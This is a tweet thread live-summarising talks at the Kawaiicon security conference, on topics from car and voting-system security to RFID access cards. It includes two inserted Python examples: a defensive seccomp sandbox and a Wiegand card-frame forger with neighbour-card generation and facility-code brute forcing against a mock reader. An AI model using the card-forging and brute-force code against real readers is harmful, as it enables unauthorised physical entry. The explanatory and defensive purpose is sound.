Thread by Jason Danner: 323 tweets, 262 min read
Good morning @kawaiiconNZ!
#Kawaiicon
This seems fine. @kiwicon
#Kawaiicon @kawaiiconNZ
Current status:
#Kawaiicon @kawaiiconNZ @kiwicon
Pretty packed house for #Kawaiicon @kawaiiconNZ...
I'm looking forward to the talk from our first speaker, the @kiwicon alpaca (or is it a llama?).
#Kawaiicon @kawaiiconNZ
And @Metlstorm gets hooked off the stage and replaced by @Sputina!

Long live @kawaiiconNZ!
#Kawaiicon
It's the #Kawaiicon @kawaiiconNZ intro!
Hmmm, it seems to be cut short, I'll post a longer one later...
#Kawaiicon
Now it's @runasand talking about Hey Look Ma, We Made It!
#Kawaiicon
Everyone has a different path to where they are today.

Just because your path doesn't look like others doesn't mean you're not a hacker.
#Kawaiicon @runasand
About Runa:
#Kawaiicon @runasand
Investigative reporting is a similar problem set to hacking.

You're both trying to solve hard problems in inventive ways.

#Kawaiicon @runasand
Runa learned to be unapologetic about saying that she's good at what she does.

#Kawaiicon @runasand
Certain careers (doctors, lawyers, etc) follow a very set career path.

InfoSec doesn't have that. There is no set path or the right way to get there.

#Kawaiicon @runasand
It's ok if you don't end up on that set path in life that you think you're supposed to follow.

Do the things you find interesting, the things that excite you, the things that make you happy.

#Kawaiicon @runasand
If something doesn't work for you in life, then you pivot.

We can create the jobs that we want.

#Kawaiicon @runasand
You can't just give someone tools (like Tor) without providing them with an educational foundation in information security.

The idea that they needed to provide reporters with this training wasn't something that anyone was asking for.
#Kawaiicon @runasand
Car hacking wasn't a thing that existed until some folks started hacking cars.

By identifying that gap they created new and interesting jobs that didn't exist before.

And a couple other examples

#Kawaiicon @runasand
NYT complained about being able to setup SecureDrop and other issues in the newsroom and Runa said "you should hire me to solve that"

Nek minnit...
#Kawaiicon @runasand
Runa built rapport with the newsroom team via competitive phishing exercises (who was getting pwned).

They loved it!

#Kawaiicon @runasand
Runa's current mission is for all journalists to work securely.

#Kawaiicon @runasand
How @nytimes is securing their newsrooms.

#Kawaiicon @runasand
You have to create solutions that don't block the work that is happening.

You don't want your pedantic security demands to block the story going on page 1.

#Kawaiicon @runasand
If you believe your story is a Pulitzer Prize winning story, you're going to be open to taking a lot more risks.

How do we enable that but still maintain security?

#Kawaiicon @runasand
Previously there was no way for someone to contact the NYTimes (as a newsroom), so they built one.

#Kawaiicon @runasand
You can replace "journalists" with "hackers" or almost any other profession.

We often strongly identify with the work that we do.

Is what I'm doing now in line with what I want to achieve? Does it make me happy? If yes, great! If no, reconsider.

#Kawaiicon @runasand @mjenkins
Alone we can do so little; together we can do so much.

#Kawaiicon @runasand
Runa wants to know what you're up to.

Please share with her over the next couple days and share with each other.

#Kawaiicon @runasand
Next up, it's Gutmann talking about Automotive Control Security!
#Kawaiicon
Hello Peter!

#Kawaiicon
Automotive Controls = everything is awful.

#Kawaiicon
Lots of cars are basically all computer now.

#Kawaiicon
Easiest attack vector is via Bluetooth in the head unit

#Kawaiicon
All of this is not good.
#Kawaiicon
Primary goal is dependability.

Trust is different in automotive systems.

Dependable system can fault, but is mitigated.

#Kawaiicon
Only when fault = failure means there is a visible error.

Many fault mitigations in place.

#Kawaiicon
Mitigations:
#Kawaiicon
Fault tolerance: basically the opposite of what crypto/security does.

#Kawaiicon
Fault mitigation vs security:
#Kawaiicon
The AUTOSAR System
#Kawaiicon
Moar AUTOSAR Environment:
#Kawaiicon
And... Moar AUTOSAR Environment:
#Kawaiicon
Gutmann!
#Kawaiicon
Basically they use a lot of super low power CPUs.
#Kawaiicon
Moores Law doesn't apply.

#Kawaiicon
Design for product life of 10-20 years...
#Kawaiicon
Large barriers to getting "shiny new things"
#Kawaiicon
Crypto resources.

Unless you want to use AES you're fucked.

#Kawaiicon
Design our own crypto! 🙄
#Kawaiicon
No idea.
#Kawaiicon
AHHHHH!
#Kawaiicon
"Let me tell you a story"
#Kawaiicon
What a car really is.

Assume the head unit will never be secure so isolate it.
#Kawaiicon
Difficult to identify where any kind of car attack makes sense.

#Kawaiicon
Attacks on cars also have to be local.

And then what?

#Kawaiicon
Other kinds of mess:
#Kawaiicon
So basically:

Don't let cryptogeeks play without adult supervision!
#Kawaiicon
A wee bit busy...
#Kawaiicon
They're all good stickers, Bront.
#Kawaiicon
Who are all these people outside?

That's where the solar radiation is...
@_devalias #Kawaiicon
Current status:
#Kawaiicon
Next up, a talk on Endpoint Detection.
#Kawaiicon
I spy... A wild @mikeforbes in the bigfoot pose.
#Kawaiicon
Now it's @pink_tangent talking about Endpoint Security.
At Honda they had a ransomware incident. She was involved with remediation - it was a 5 day recovery.

#Kawaiicon @pink_tangent
Remediation cost approx quarter of a mil...

Remediation isn't cheap. And it happens repeatedly.

#Kawaiicon @pink_tangent
Some vendors will try and guarantee that if you run their product, you won't get cryptoed.

"If you just put the endpoint security on the file servers, that'll solve the problem!" Nope.
#Kawaiicon @pink_tangent
Evolution of Endpoint AV.
#Kawaiicon @pink_tangent
Then @pink_tangent created her own testing framework.
#Kawaiicon
You need to be requirements focused
#Kawaiicon @pink_tangent
Research timeline
#Kawaiicon @pink_tangent
Testing framework - available on Github.

#Kawaiicon @pink_tangent
Preparation:

Can they support legacy applications?

What about virtual environments?

#Kawaiicon #KawaiiconNZ @pink_tangent
Test Case 1: Static Malware
#Kawaiicon #KawaiiconNZ @pink_tangent
Static Analysis Considerations
#Kawaiicon #KawaiiconNZ @pink_tangent
Test Case 2a: Dynamic/Execution
#Kawaiicon #KawaiiconNZ @pink_tangent
Powershell script to execute malware!
#Kawaiicon #KawaiiconNZ @pink_tangent
Via PowerShell the vendor missed everything. Via batch script they caught everything... 🤔
#Kawaiicon #KawaiiconNZ @pink_tangent
Test Case 2b: Dynamic / Execution with all features turned on

#Kawaiicon #KawaiiconNZ @pink_tangent
Ransomware makes a great test sample because it's very visible.

#Kawaiicon #KawaiiconNZ @pink_tangent
Test Case 2 Findings:
#Kawaiicon #KawaiiconNZ @pink_tangent
Test Case 3: MITRE ATT&CK framework is awesome.

#Kawaiicon #KawaiiconNZ @pink_tangent
Test Case 3: scoring
#Kawaiicon #KawaiiconNZ @pink_tangent
Test Case 3: Findings

#Kawaiicon #KawaiiconNZ @pink_tangent
Moar findings: This stuff is hard
#Kawaiicon #KawaiiconNZ @pink_tangent
Test Case 4: Business Compatibility
Deploy to your environment and just see what it comes up with over a few months.

Test it in silent mode so you get reporting but it doesn't kill your apps

Needs asset archiving

#Kawaiicon #KawaiiconNZ @pink_tangent
Key takeaways:

There is no silver bullet.

#Kawaiicon #KawaiiconNZ @pink_tangent
And Courtney is there to talk about... Incident response!
#Kawaiicon #KawaiiconNZ
The Mechanics of Being Good to Each Other.
#Kawaiicon #KawaiiconNZ @hashoctothorpe
Who doesn't like a good disaster where nobody dies?
#Kawaiicon #KawaiiconNZ @hashoctothorpe
So, here they were blasting the tarmac off the top of this bridge.

They were told not to allow waste water to flow into the lake, so they stored it in the hollow bridge.

But then there was a storm. One pontoon sank & dragged down others...
#Kawaiicon #KawaiiconNZ @hashoctothorpe
Shit is more likely to break when you are fucking with it.
#Kawaiicon #KawaiiconNZ @hashoctothorpe
"We've determined that concrete pontoons don't float when they're filled with water" 🙄
#Kawaiicon #KawaiiconNZ @hashoctothorpe
But this isn't what actually happened:

They had problems keeping up with the pumping schedule.

Some pontoons had more water which caused torsion and the winds twisted the pontoons more. This caused cracks to open and the pontoon to sink.
#Kawaiicon #KawaiiconNZ @hashoctothorpe
Why did the pumping schedule get fucked up? We'll never know.

#Kawaiicon #KawaiiconNZ @hashoctothorpe
No one does things they think will blow up the world*

(*mostly)

#Kawaiicon #KawaiiconNZ @hashoctothorpe
So how do we do better?
#Kawaiicon #KawaiiconNZ @hashoctothorpe
Facilitation: a crash course:

Keep the conversation blame free.

Don't make bad jokes

#Kawaiicon #KawaiiconNZ @hashoctothorpe
You can swear, just not at people.

#Kawaiicon #KawaiiconNZ @hashoctothorpe
Miller's Law:

The key to understanding systems and people with different perspectives than you do.

No two people have experience of the same incident.
#Kawaiicon #KawaiiconNZ @hashoctothorpe
Let's talk about blame.

Things to avoid:
"you"
"why"
And more...

#Kawaiicon #KawaiiconNZ @hashoctothorpe
Example:

This isn't compassionate and it's not helping to identify the problem

#Kawaiicon #KawaiiconNZ @hashoctothorpe
Better things to say.

What questions can we ask to get the longest answer. Different from what we normally want in business.

We are looking for a remediation item.

#Kawaiicon #KawaiiconNZ @hashoctothorpe
Human error is not a root cause.

How were people able to make that error?
#Kawaiicon #KawaiiconNZ @hashoctothorpe
"Try harder" isn't a remediation
#Kawaiicon #KawaiiconNZ @hashoctothorpe
How to have a great meeting:
- Stay on time and on topic
- Practice interrupting (for a good reason)
- Who is talking and who isn't?
- Let's talk about humour (or please don't)
#Kawaiicon #KawaiiconNZ @hashoctothorpe
Getting it wrong makes people feel uncomfortable.

Avoid:
#Kawaiicon #KawaiiconNZ @hashoctothorpe
You probably can say:
#Kawaiicon #KawaiiconNZ @hashoctothorpe
If you mess up, apologise and move on.
#Kawaiicon #KawaiiconNZ @hashoctothorpe
You don't have to be witty

#Kawaiicon #KawaiiconNZ @hashoctothorpe
If someone makes a bad joke just say:

Then move on & never bring it up again.

#Kawaiicon #KawaiiconNZ @hashoctothorpe
In 2019 we don't need more ways to be separated and divided from our peers. We need to move forward and make better mistakes together

#Kawaiicon #KawaiiconNZ @hashoctothorpe
Now it's Aliz talking about Gargoyle.

#Kawaiicon #KawaiiconNZ
WTF is Gargoyle?

Hiding malicious code in a bit of memory that is not executable.

#Kawaiicon #KawaiiconNZ
Dormant with no executable code until...
#Kawaiicon #KawaiiconNZ
What is Gargoyle?
#Kawaiicon #KawaiiconNZ
How do we detect Gargoyle?

No documented way
#Kawaiicon #KawaiiconNZ
But... We can use Volatility!
#Kawaiicon #KawaiiconNZ
Detection:
Script works ok, but is very manual.
#Kawaiicon #KawaiiconNZ
Automation can get over the top. Otherwise you can end up just handing people a "magic box that stops the hackers"
#Kawaiicon #KawaiiconNZ
Use an emulation agent!

Unicorn Engine!
#Kawaiicon #KawaiiconNZ
Now with sweet scripts!
#Kawaiicon #KawaiiconNZ
In summary:

Now we can detect this, and so can you!

Thanks @AlizTheHax0r!
#Kawaiicon #KawaiiconNZ
Now, lunchtime!

Who let this old guy on stage?

Apparently there is a code brown?!

A risk register line item that has never been activated before!

#Kawaiicon #KawaiiconNZ @Metlstorm
Oh, the humanity!
#Kawaiicon #KawaiiconNZ
Perfect con lunch pozzie.
#Kawaiicon #KawaiiconNZ
Current status:
#Kawaiicon #KawaiiconNZ
Now @Sputina is kicking off the afternoon!
#Kawaiicon #KawaiiconNZ
Now Chris is telling us about internet voting systems
#Kawaiicon #KawaiiconNZ
What do we want from a voting system?

#Kawaiicon #KawaiiconNZ
Verifiability isn't just to demonstrate correctness, it's to ensure a peaceful transfer of power.

The loser can be shown that the results are false.

#Kawaiicon #KawaiiconNZ
The thing that most government departments do not want to happen is to become a hashtag.

They will do almost anything to avoid it.

#Kawaiicon #KawaiiconNZ
Two kinds of voting:
Supervised (the government is responsible for the validity of your vote) vs remote (you're responsible for validity of your vote)
#Kawaiicon #KawaiiconNZ
Supervised vs remote voting

Should responsibility be on the state or the individual?
#Kawaiicon #KawaiiconNZ
Postal vs internet voting

Difference is in the scale of the required conspiracy.

#Kawaiicon #KawaiiconNZ
But that doesn't dissuade the push for internet voting.

Argument is it will cause increased turnout. But that hasn't played out in reality.

#Kawaiicon #KawaiiconNZ
No evidence that internet voting will increase turnout.

More likely you disenfranchise a cohort without easy access to the internet.

#Kawaiicon #KawaiiconNZ
What verifiability do we need from electronic voting?

Need individual verifiability & universal verifiability (so everyone knows that all the votes were correctly counted).

#Kawaiicon #KawaiiconNZ
The problem is that we have to rely on paper for the intrinsic commitments.

#Kawaiicon #KawaiiconNZ
Internet voting conceptually:

Doesn't offer what we want.

So why are we still deploying it?

#Kawaiicon #KawaiiconNZ
Internet voting deployments.

These are all done by Scytl - but nobody knows who they're owned by and people who look into it get shut down quickly. 😳

References to @SarahJamieLewis
& @VTeagueAus
#Kawaiicon #KawaiiconNZ
Lots of security concerns...

They opened up the central voting system to Scytl because there were "performance problems".

Please. No.

#Kawaiicon #KawaiiconNZ
When they went to deploy it in Western Australia...

They were sharing an SSL cert with... Lots of orgs.

Lots of bad bad not good.

#Kawaiicon #KawaiiconNZ
Just setting a session cookie that profiles the browser.

And they broke the separation principle.

#Kawaiicon #KawaiiconNZ
How is the encryption?

Partial votes are very vulnerable.

#Kawaiicon #KawaiiconNZ
Private key was responding from lots of places...

Auditor says it's ok because the vendor is reputable.

But... They were breached over that period.

#Kawaiicon #KawaiiconNZ
And... @Stats_NZ used the same provider. 😬

#Kawaiicon #KawaiiconNZ
For 2019 the Auditors got better.

27 findings, some very critical. And weird redactions.

#Kawaiicon #KawaiiconNZ
Internet voting deployment summary

#Kawaiicon #KawaiiconNZ
Internet voting is a complex problem that is extremely difficult to solve.

#Kawaiicon #KawaiiconNZ
Now @Metlstorm found somebody's credit card...

#Kawaiicon #KawaiiconNZ
Now it's @vashta_nerdrada telling us about how to prepare for the unexpected.
#Kawaiicon #KawaiiconNZ
What day is today?

It's 0-day!

#Kawaiicon #KawaiiconNZ @vashta_nerdrada
Let's make a threat model!

#Kawaiicon #KawaiiconNZ @vashta_nerdrada
We tend to be arrogant...

#Kawaiicon #KawaiiconNZ @vashta_nerdrada
"Black Swans" - basically a saying for something impossible.

Now it's something impossible that is actually happening.

#Kawaiicon #KawaiiconNZ @vashta_nerdrada
What is a black swan?

#Kawaiicon #KawaiiconNZ @vashta_nerdrada
A 🦃 has a black swan experience. It's happily living its life - getting randomly killed is totally unexpected.

#Kawaiicon #KawaiiconNZ @vashta_nerdrada
Or this guy... BIG black swan...
#Kawaiicon #KawaiiconNZ @vashta_nerdrada
Don't try and predict black swans - you make yourself more vulnerable to other black swans.

#Kawaiicon #KawaiiconNZ @vashta_nerdrada
Security is a by-product of excellence & engineering.

#Kawaiicon #KawaiiconNZ @vashta_nerdrada
0-day all day.

Very quick response from @heroku

#Kawaiicon #KawaiiconNZ @vashta_nerdrada
Positives and negatives
#Kawaiicon #KawaiiconNZ @vashta_nerdrada
Where should I invest?

#Kawaiicon #KawaiiconNZ @vashta_nerdrada
So where do I invest the remaining 15%

#Kawaiicon #KawaiiconNZ @vashta_nerdrada
Invest in preparedness, not in prediction.

#Kawaiicon #KawaiiconNZ @vashta_nerdrada
Black Swans and Blindness

#Kawaiicon #KawaiiconNZ @vashta_nerdrada
Harden, test, validate.

#Kawaiicon #KawaiiconNZ @vashta_nerdrada
Supply chain verification:
#Kawaiicon #KawaiiconNZ @vashta_nerdrada
How do they secure things at @heroku?

Linux capabilities:
#Kawaiicon #KawaiiconNZ @vashta_nerdrada
Seccomp policies & unprivileged users
#Kawaiicon #KawaiiconNZ @vashta_nerdrada
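The two slides above (Linux capabilities, then seccomp policies with unprivileged users) are the usual layering for a sandbox: drop privilege, then restrict the syscall surface so a later 0-day in the app has less to reach. The block below is an added example written for this page; it is not Heroku's code and nothing from the talk. It hand-assembles a minimal seccomp-bpf program, installs it through prctl(2) after setting no_new_privs, and reports the process's capability sets from /proc. Assumptions: only x86_64 and aarch64 are handled, and getpriority(2) is the syscall denied purely so the effect is observable; a real policy would be an allow-list.

```python
"""Minimal seccomp-bpf + no_new_privs demo (Linux only, stdlib ctypes, no deps).

Added example for this page; not Heroku's or the speaker's code.
"""
import ctypes
import errno
import os
import platform
import struct
import sys

# prctl(2) option numbers, from <linux/prctl.h> and <linux/seccomp.h>
PR_SET_SECCOMP = 22
PR_SET_NO_NEW_PRIVS = 38
PR_GET_NO_NEW_PRIVS = 39
SECCOMP_MODE_FILTER = 2

# Classic BPF opcodes and seccomp return actions
BPF_LD_W_ABS = 0x20            # A = 32-bit word at absolute offset k
BPF_JMP_JEQ_K = 0x15           # if A == k: pc += jt else pc += jf
BPF_RET_K = 0x06               # return k
SECCOMP_RET_ALLOW = 0x7FFF0000
SECCOMP_RET_ERRNO = 0x00050000  # low 16 bits carry the errno handed back

# AUDIT_ARCH value and getpriority(2) number per architecture (assumption: only these two)
ARCH_TABLE = {
    "x86_64": (0xC000003E, 140),
    "aarch64": (0xC00000B7, 141),
}
SUPPORTED = sys.platform == "linux" and platform.machine() in ARCH_TABLE


def bpf_insn(code, k, jt=0, jf=0):
    """Pack one struct sock_filter {u16 code; u8 jt; u8 jf; u32 k}."""
    return struct.pack("HBBI", code, jt, jf, k)


def build_filter(audit_arch, denied_nr, err=errno.EPERM):
    """BPF program: fail `denied_nr` with `err`, allow every other syscall.

    The arch check comes first: syscall numbers differ per ABI, so a filter
    that skips it can be bypassed by a foreign-ABI syscall.
    """
    return b"".join([
        bpf_insn(BPF_LD_W_ABS, 4),                       # 0: A = seccomp_data.arch
        bpf_insn(BPF_JMP_JEQ_K, audit_arch, jt=0, jf=3),  # 1: wrong arch -> insn 5 (allow)
        bpf_insn(BPF_LD_W_ABS, 0),                       # 2: A = seccomp_data.nr
        bpf_insn(BPF_JMP_JEQ_K, denied_nr, jt=0, jf=1),   # 3: match -> insn 4, else insn 5
        bpf_insn(BPF_RET_K, SECCOMP_RET_ERRNO | err),    # 4: deny with errno
        bpf_insn(BPF_RET_K, SECCOMP_RET_ALLOW),          # 5: allow
    ])


class SockFprog(ctypes.Structure):
    _fields_ = [("len", ctypes.c_ushort), ("filter", ctypes.c_void_p)]


def install_filter(program):
    """Set no_new_privs, then load the filter for the calling thread."""
    libc = ctypes.CDLL(None, use_errno=True)
    # Required for an unprivileged loader, and it also stops setuid/fscaps
    # binaries from regaining privilege after exec.
    if libc.prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0:
        raise OSError(ctypes.get_errno(), "PR_SET_NO_NEW_PRIVS failed")
    buf = ctypes.create_string_buffer(program, len(program))
    prog = SockFprog(len(program) // 8, ctypes.addressof(buf))
    if libc.prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, ctypes.byref(prog), 0, 0) != 0:
        raise OSError(ctypes.get_errno(), "PR_SET_SECCOMP failed")


def no_new_privs():
    libc = ctypes.CDLL(None, use_errno=True)
    return libc.prctl(PR_GET_NO_NEW_PRIVS, 0, 0, 0, 0) == 1


def capability_sets():
    """Capability sets the kernel reports for this process (CapEff, CapBnd, ...)."""
    sets = {}
    with open("/proc/self/status") as status:
        for line in status:
            if line.startswith("Cap"):
                name, value = line.split(":", 1)
                sets[name] = int(value.strip(), 16)
    return sets


def probe():
    """Install the filter, then show getpriority(2) now fails; returns the errno name."""
    audit_arch, nr = ARCH_TABLE[platform.machine()]
    install_filter(build_filter(audit_arch, nr))
    try:
        os.getpriority(os.PRIO_PROCESS, 0)
    except PermissionError as exc:
        return errno.errorcode[exc.errno]
    return "allowed"


if __name__ == "__main__":
    if SUPPORTED:
        print("caps before:", {k: hex(v) for k, v in capability_sets().items()})
        print("getpriority after filter:", probe(), "no_new_privs:", no_new_privs())
    else:
        print("Linux x86_64/aarch64 only")
```

Note that SECCOMP_RET_ERRNO keeps the process alive and hands the syscall a clean error, which is what you want while building a policy; once it is stable, switch the default branch from allow to deny so new syscalls reached by a CVE are blocked rather than permitted.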
How does this work with CVEs?

#Kawaiicon #KawaiiconNZ @vashta_nerdrada
Quick recap:

Build for resiliency, don't try and predict black swans.

#Kawaiicon #KawaiiconNZ @vashta_nerdrada
Now talking about APIC Fail with Oliver
#Kawaiicon #KawaiiconNZ
The what and the why:
#Kawaiicon #KawaiiconNZ
What are we talking about?

#Kawaiicon #KawaiiconNZ
System details:
#Kawaiicon #KawaiiconNZ
Vulnerability no 1
#Kawaiicon #KawaiiconNZ
Attack scenario:
#Kawaiicon #KawaiiconNZ
Uh, you can extract the private key (same on every switch)...

#Kawaiicon #KawaiiconNZ
Exploit chain:

Critical CVE

#Kawaiicon #KawaiiconNZ
Vulnerability no 2:
#Kawaiicon #KawaiiconNZ
Network communication
#Kawaiicon #KawaiiconNZ
And... Vulnerability no 3!
#Kawaiicon #KawaiiconNZ
And.. We've got a buffer overflow!
#Kawaiicon #KawaiiconNZ
Remaining problems:
#Kawaiicon #KawaiiconNZ
Recommendations:

Patch, you fools!

#Kawaiicon #KawaiiconNZ
"Bow to the demo gods!" instructs @Sputina.
#Kawaiicon #KawaiiconNZ
Who let these muppets in?
@rafaelmagu
#Kawaiicon #KawaiiconNZ
In which @Sputina forces us to all get some exercise by making @Metlstorm badger dance.
#Kawaiicon #KawaiiconNZ
Some shit went down between the sheep and that stage light... 🧐
#Kawaiicon #KawaiiconNZ
"Hello, you've reached Alpaca Security Corp."
#Kawaiicon #KawaiiconNZ
And @Sputina opens the evening session
#Kawaiicon #KawaiiconNZ
What is this talk about?

#Kawaiicon #KawaiiconNZ @SophiaFrentz
What is a genome?

What data can we get from it?

#Kawaiicon #KawaiiconNZ @SophiaFrentz
We don't have a lot of data on marginalised groups, but we still try and use it even though our results are bad.

#Kawaiicon #KawaiiconNZ @SophiaFrentz
Your DNA is unique to you sooo... It can't be anonymised...

#Kawaiicon #KawaiiconNZ @SophiaFrentz
How do we do open science but protect end users?

Even if you consent, you're providing info on your immediate family.

#Kawaiicon #KawaiiconNZ @SophiaFrentz
Closed science vs Open science:
Pros & Cons

#Kawaiicon #KawaiiconNZ @SophiaFrentz
Genetic discrimination is illegal but so is murder. And it still happens.

#Kawaiicon #KawaiiconNZ @SophiaFrentz
The risk I took was calculated but man, I'm bad at math. 😂
#Kawaiicon #KawaiiconNZ @SophiaFrentz
Does it matter?

Yes.

So, how do we move forward?

#Kawaiicon #KawaiiconNZ @SophiaFrentz
Short intermission to breathe.

#Kawaiicon #KawaiiconNZ @SophiaFrentz
Electronic medical records vs physical medical records.

It's not all bad! And electronic medical records provide quick access to information.

#Kawaiicon #KawaiiconNZ @SophiaFrentz
There are plenty of breaches, but nobody is attacking these. It's a design issue.

#Kawaiicon #KawaiiconNZ @SophiaFrentz
Where is eHealth going?

We have to consider social issues when creating technical solutions.

With technical solutions we're just amplifying existing social problems.

#Kawaiicon #KawaiiconNZ @SophiaFrentz
What can we do?

- Make responsible individual decisions
- Educating non-sector friends on needs, requirements & values
- Be the squeaky wheel!

#Kawaiicon #KawaiiconNZ @SophiaFrentz
The choice about whether to care if other people see my medical information is MY choice.

Nobody else should be able to make those decisions without the patient's explicit consent.

#Kawaiicon #KawaiiconNZ @SophiaFrentz
Now it's Matt Daley talking about Access Control on Sesame Street

#Kawaiicon #KawaiiconNZ @SophiaFrentz
How does an RFID card reader work?
#Kawaiicon #KawaiiconNZ
The Gallagher Controller 6000, now known at @kawaiiconNZ as the "Controllagher"
#Kawaiicon #KawaiiconNZ
These are using 386 CPUs...

#Kawaiicon #KawaiiconNZ
What about readers?

New fancy!
#Kawaiicon #KawaiiconNZ
And old ones...

#Kawaiicon #KawaiiconNZ
Thanks FCC for putting all this info online.

With photos.

And internals.

And... Dave's details.

#Kawaiicon #KawaiiconNZ
Why Sesame Street?

That's what Gallagher uses for product code names!

#Kawaiicon #KawaiiconNZ
How do we exploit this?

#Kawaiicon #KawaiiconNZ
Attack via cloud?

#Kawaiicon #KawaiiconNZ
What about the reader?

It hungers for a card... But which one?

#Kawaiicon #KawaiiconNZ
Cards use the Wiegand effect

#Kawaiicon #KawaiiconNZ
Sure. Why not?

#Kawaiicon #KawaiiconNZ
Trying to find all of these fields in the zeros and ones.

#Kawaiicon #KawaiiconNZ
Yes, yes. Exactly. What Matt said.

#Kawaiicon #KawaiiconNZ
"This is a simple cypher"
#Kawaiicon #KawaiiconNZ
"And we decode it"
#Kawaiicon #KawaiiconNZ
"Breaking into the roof"

This should be fun! Basically incrementing a field on the card.

#Kawaiicon #KawaiiconNZ
Now let's look at MIFARE

#Kawaiicon #KawaiiconNZ
First taste of real crypto using "Crypto 1"
#Kawaiicon #KawaiiconNZ
Let's see how Gallagher is using MIFARE Classic.

Known vulnerability where you can use one key to calculate other keys.

#Kawaiicon #KawaiiconNZ
Let's look in that locked sector!

#Kawaiicon #KawaiiconNZ
So MIFARE Classic is bad, how did they replace it?

LOL all bad.

#Kawaiicon #KawaiiconNZ
So what should we do?

Create a new file based key (not block based).

#Kawaiicon #KawaiiconNZ
This seems fine

#Kawaiicon #KawaiiconNZ
Default site key?

Can we find that?

#Kawaiicon #KawaiiconNZ
Does Matt know? Yes.

Will he tell us? No.

So Gallagher won't do electro-product testing on him.

#Kawaiicon #KawaiiconNZ
Let's look at other fun excitement.

#Kawaiicon #KawaiiconNZ
Can we use an Arduino for a timing attack?

#Kawaiicon #KawaiiconNZ
Watching valid/invalid cards and responses messages.

#Kawaiicon #KawaiiconNZ
Can brute force facility code in 4 hrs.

Seems like a while...

#Kawaiicon #KawaiiconNZ
Use a Bluno Beetle in the reader to brute force the facility code, then play it back on demand.

#Kawaiicon #KawaiiconNZ
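The Wiegand decoding a few tweets up (finding the fields in the zeros and ones, then "breaking into the roof" by incrementing a field on the card) and the facility-code brute force just described both need the same frame encoder, so one added example covers both. It is not code from the talk or from Gallagher. It assumes the generic 26-bit Wiegand layout (leading even parity, 8-bit facility code, 16-bit card number, trailing odd parity); Gallagher's own field widths are not given in the thread and are not assumed. The enrolled-card "reader" is a constructed stand-in for the accept/reject oracle a microcontroller wired into a real reader would watch.

```python
"""26-bit Wiegand (H10301-style) frame parser, validator and forger.

Added example for this page; not code from the talk or from Gallagher.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Card26:
    facility: int  # 8-bit facility code, frame bits 1-8
    number: int    # 16-bit card number, frame bits 9-24


def _parity(bits):
    """1 if an odd number of the given bits are set, else 0."""
    return sum(bits) & 1


def encode26(card):
    """Build the frame: [even parity][8-bit FC][16-bit number][odd parity]."""
    if not (0 <= card.facility < 256 and 0 <= card.number < 65536):
        raise ValueError("field out of range for a 26-bit frame")
    data = [int(b) for b in f"{card.facility:08b}{card.number:016b}"]
    even = _parity(data[:12])      # leading bit makes frame bits 0-12 even
    odd = 1 - _parity(data[12:])   # trailing bit makes frame bits 13-25 odd
    return f"{even}{''.join(map(str, data))}{odd}"


def decode26(frame):
    """Check both parity bits, then split the frame into its fields."""
    if len(frame) != 26 or set(frame) - {"0", "1"}:
        raise ValueError("not a 26-bit frame")
    bits = [int(b) for b in frame]
    if _parity(bits[0:13]) != 0:
        raise ValueError("even parity check failed")
    if _parity(bits[13:26]) != 1:
        raise ValueError("odd parity check failed")
    return Card26(int(frame[1:9], 2), int(frame[9:25], 2))


def neighbours(card, span=5):
    """Frames for card numbers adjacent to a known card at the same facility.

    This is the 'increment a field' attack: card numbers are issued in
    sequence, so one valid card predicts its neighbours, parity included.
    """
    lo, hi = max(0, card.number - span), min(65535, card.number + span)
    return [encode26(Card26(card.facility, n))
            for n in range(lo, hi + 1) if n != card.number]


def make_reader(enrolled):
    """Constructed stand-in for a controller: accepts only enrolled cards.

    A real reader leaks the same accept/reject bit via LED, beeper or
    response message, which is what a device spliced into it observes.
    """
    def reader(frame):
        try:
            return decode26(frame) in enrolled
        except ValueError:
            return False
    return reader


def brute_force_facility(reader, number):
    """Try every facility code for a known card number against the oracle.

    Returns (facility, attempts) for the first accepted code, else (None, attempts).
    """
    attempts = 0
    for fc in range(256):
        attempts += 1
        if reader(encode26(Card26(fc, number))):
            return fc, attempts
    return None, attempts


if __name__ == "__main__":
    site = make_reader({Card26(0x55, 0x1234)})  # constructed enrolment list
    frame = encode26(Card26(0x55, 0x1234))
    print(frame, decode26(frame))
    print(brute_force_facility(site, 0x1234))
    print(neighbours(Card26(0x55, 0x1234), 2))
```

With an 8-bit facility code the search is 256 presentations, so the four-hour figure from the talk implies a wider field and a slower oracle than this toy; the width of Gallagher's field is not on the page. The defence is the same either way: a reader should not be an accept/reject oracle for unknown facility codes without rate limiting or tamper detection, and card data should be authenticated rather than a plain sequence number.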
Now looking at GBUS.

#Kawaiicon #KawaiiconNZ
Looking at HBUS

Can't just plug in your own malicious controller.

#Kawaiicon #KawaiiconNZ
Validating a new reader.

#Kawaiicon #KawaiiconNZ
Any HBUS vulnerability?

No... For now...

#Kawaiicon #KawaiiconNZ
Now looking at cards.

Old cards just scream out their secret the second they're powered up.

#Kawaiicon #KawaiiconNZ
Forms of Rf-based attack.

Try and intercept the communication between a legit card & reader.

#Kawaiicon #KawaiiconNZ
What happens when the reader talks to the card?

#Kawaiicon #KawaiiconNZ
What happens if some data gets corrupted in the transaction?

Reader says do it again.

#Kawaiicon #KawaiiconNZ
We can guess bad bits.

#Kawaiicon #KawaiiconNZ
We can use software defined radio to sniff card reader interactions

#Kawaiicon #KawaiiconNZ
Reader signals are much stronger than card responses.

#Kawaiicon #KawaiiconNZ
And.. Matt built a massive antenna to read cards from 3 meters...

Not very subtle...

#Kawaiicon #KawaiiconNZ
So none of these are secure unless they're using DESFire with a non-default key.

#Kawaiicon #KawaiiconNZ
Testing 95 readers:
#Kawaiicon #KawaiiconNZ
Only one site was using a non-default site key.

And... The NZ Government department didn't appreciate Matt scanning their RFID readers and seized his laptop... 😱

#Kawaiicon #KawaiiconNZ
What can you do?
#Kawaiicon #KawaiiconNZ
Use the security health check!
#Kawaiicon #KawaiiconNZ
Now it's @lady_nerd talking about securing people who don't look like you... yet.

#Kawaiicon #KawaiiconNZ
What will we talk about it?

#Kawaiicon #KawaiiconNZ @lady_nerd
Life happens to you while you're busy making other plans.

#Kawaiicon #KawaiiconNZ @lady_nerd
Being security people we tend to judge how people handle their security.

But for other people our advice can be because that advice would be physically difficult or impossible to follow.

#Kawaiicon #KawaiiconNZ @lady_nerd
How do we help people who aren't like us?

#Kawaiicon #KawaiiconNZ @lady_nerd
If all the advice I give is coloured by my knowledge and experiences, it's not going to be effective for people from other experiences.

#Kawaiicon #KawaiiconNZ @lady_nerd
We almost completely dissociate from our own future selves.

